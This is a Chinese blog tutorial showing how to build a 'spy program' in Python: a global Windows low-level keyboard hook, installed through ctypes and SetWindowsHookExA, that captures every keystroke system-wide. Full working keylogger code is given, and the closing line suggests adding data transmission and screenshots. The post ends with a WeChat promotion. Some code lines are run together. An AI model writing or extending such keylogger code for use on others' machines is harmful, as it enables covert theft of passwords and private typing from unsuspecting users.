作者：寂夜云

https://www.cnblogs.com/lonenysky/p/12341074.html

这次我们使用 Python 来打造一款间谍程序，程序中会用到许多知识点，大致分为四块：

• win32API

• Python基础，重点在cpytes库的使用

• C语言基础

• Hook

程序的基本原理在于通过注册Hook，记录系统事件。

那么什么是Hook呢？

Hook 技术又叫做钩子函数，系统在调用函数之前，钩子程序就先捕获该消息，钩子函数先得到控制权，这时钩子函数既可以加工处理（改变）该函数的执行行为，还可以强制结束消息的传递

注册Hook时我们需要先导入DLL库，在Python中我们使用ctypes来导入，导入方法如下

user32 = CDLL("user32.dll")
kernel32 = CDLL("kernel32.dll")

我们导入了user32.dll和kernel32.dll。这两个DLL有什么用处呢

• user32.dll 是Windows用户界面相关应用程序接口，用于包括Windows处理，基本用户界面等特性，如创建窗口和发送消息

• kernel32.dll 控制着系统的内存管理、数据的输入输出操作和中断处理**

流程部分

知道了我们要使用什么样的工具，那么第一步应该怎么做呢？

1、首先我们需要先注册Hook到系统上，通过user32.dll中的SetWindowsHookExA函数，我们可以在系统上注册钩子

HHOOK SetWindowsHookExA( int idHook,HOOKPROC  lpfn,HINSTANCE hmod,DWORD     dwThreadId
);

通过查看文档我们看到SetWindowsHookExA函数的参数及参数类型如上所示。

通过文档我们看到第一个参数idHook中填入钩子的类型

WH_KEYBOARD_LL的常量值为13代表的意思是监视低级键盘输入事件，我们此处来监听键盘事件

第二个参数lpfn代表指向钩子过程的指针，要填入钩子过程（函数），我们可以在此处来添加额外代码达到我们想要达成的目的

第三个参数hmod表示为DLL句柄，我们可以使用kernel32中的GetModuleHandleW来获取句柄

最后一个参数dwThreadId我们填入0代表与同一桌面上所有的线程关联

代码如下

user32.SetWindowsHookExA(13,handleProc,kernel32.GetModuleHandleW(),0)

如何使用Python来编写我们的钩子过程呢，通过ctypes文档我们可以得知windows下使用WINFUNCTYPE来创建函数

此时我们发现有WINFUNCTYPE和CFUNCTYPE两个函数，具体要使用哪一个呢，这两个的区别为

• WINFUNCTYPE 为Windows下独有的，通过使用使用stdcall调用约定的函数

• CFUNCTYPE 使用标准C调用约定的函数

HOOKPROC = WINFUNCTYPE(c_int, c_int, c_int, POINTER(DWORD))

因为我们调用的是WH_KEYBOARD_LL,WH_KEYBOARD_LL会使用LowLevelKeyboardProc回调函数，同时我们也需要在Python定义它

LowLevelKeyboardProc数据结构如下

LRESULT CALLBACK LowLevelKeyboardProc(_In_ int nCode,_In_ WPARAM wParam,_In_ LPARAM lParam
);

按照官方文档提示 如果**nCode**小于零，则挂钩过程必须将消息传递给CallNextHookEx函数，而无需进一步处理，并且应返回CallNextHookEx返回的值

我们转换为Python代码

class KBDLLHOOKSTRUCT(Structure):_fields_ = [('vkCode', DWORD),('scanCode', DWORD),('flags', DWORD),('time', DWORD),('dwExtraInfo', DWORD)] def hookProc(nCode, wParam, lParam): if nCode < 0: return user32.CallNextHookEx(hooked, nCode, wParam, lParam) else:# 此处插入我们的代码 passreturn user32.CallNextHookEx(hooked, nCode, wParam, lParam)

最后在我们退出程序时还需要删除Hook，不然大量的Hook会使系统运行缓慢，虽然在Windows 7及更高版本上，该钩子会被静默删除而不被调用。应用程序无法知道挂钩是否已删除。我们还是主动进行删除

删除需要使用user32.dll的UnhookWindowsHookEx，参数为Hook句柄

user32.UnhookWindowsHookEx(hooked)

下面贴上全部代码

import sys
from ctypes import *
from ctypes.wintypes import DWORD, HHOOK, HINSTANCE, MSG, WPARAM, LPARAMuser32 = CDLL("user32.dll")
kernel32 = CDLL("kernel32.dll")class KBDLLHOOKSTRUCT(Structure):_fields_ = [('vkCode', DWORD),('scanCode', DWORD),('flags', DWORD),('time', DWORD),('dwExtraInfo', DWORD)]def uninstallHookProc(hooked):if hooked is None:returnuser32.UnhookWindowsHookEx(hooked)hooked = Nonedef hookProc(nCode, wParam, lParam):if nCode < 0:return user32.CallNextHookEx(hooked, nCode, wParam, lParam)else:if wParam == 256:if 162 == lParam.contents.value:print("Ctrl pressed, call Hook uninstall()")uninstallHookProc(hooked)sys.exit(-1)capsLock = user32.GetKeyState(20)# kb_struct = cast(lParam, POINTER(KBDLLHOOKSTRUCT))if lParam.contents.value==13:print("\n")elif capsLock:print(chr(lParam.contents.value),end="")else:print(chr(lParam.contents.value+32),end="")return user32.CallNextHookEx(hooked, nCode, wParam, lParam)def startKeyLog():msg = MSG()user32.GetMessageA(byref(msg), 0, 0, 0)def installHookProc(hooked, pointer):hooked = user32.SetWindowsHookExA(13,pointer,kernel32.GetModuleHandleW(),0)if not hooked:return Falsereturn TrueHOOKPROC = WINFUNCTYPE(c_int, c_int, c_int, POINTER(DWORD))
pointer = HOOKPROC(hookProc)
hooked = None
if installHookProc(hooked, pointer):print("Hook installed")try:msg = MSG()user32.GetMessageA(byref(msg), 0, 0, 0)except KeyboardInterrupt as kerror:uninstallHookProc(hooked)print("Hook uninstall...")
else:print("Hook installed error")

贴上我们的效果图

我们还可以再添加上额外的代码比如数据传输，截屏等等  ^_^

来和小伙伴们一起向上生长呀！扫描下方二维码，添加小詹微信，可领取千元大礼包并申请加入 Python 学习交流群，群内仅供学术交流，日常互动，如果是想发推文、广告、砍价小程序的敬请绕道！一定记得备注「交流学习」，我会尽快通过好友申请哦！????长按识别，添加微信（添加人数较多，请耐心等待）????长按识别，关注小詹（扫码回复 1024 领取程序员大礼包）